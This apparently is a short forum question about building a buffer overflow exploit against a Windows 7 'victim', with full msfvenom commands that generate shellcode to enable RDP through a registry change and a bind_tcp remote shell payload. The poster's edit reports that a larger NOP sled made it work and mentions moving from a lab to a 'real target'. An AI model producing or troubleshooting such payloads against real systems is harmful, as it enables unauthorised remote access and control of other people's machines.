MSFvenom for turning on RDP

I am crafting a BOF and trying to use MSFvenom’s windows/exec payload to do a regedit turning on RDP access

I have tried

msfvenom -p windows/exec CMD='reg add "HKEY_LOCAL_MACHINE\\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' -f c -b "\x00\x0a\x0d\x20"

I know the BOF works because it can call calc.exe shellcode. so I have replaced it with the above and it won’t work.

Any suggestions? what am I missing? This is for a Win 7 machine as a victim

I have also tried

msfvenom -p windows/shell/bind_tcp -f c -b "\x00\x0a\x0d\x20" RHOST=X LPORT=X

this also does not work.

Edit: Disregard. Those are the correct syntax for them. I just needed to make my NOP sled bigger

now to find out why it works on my lab but not on the real target.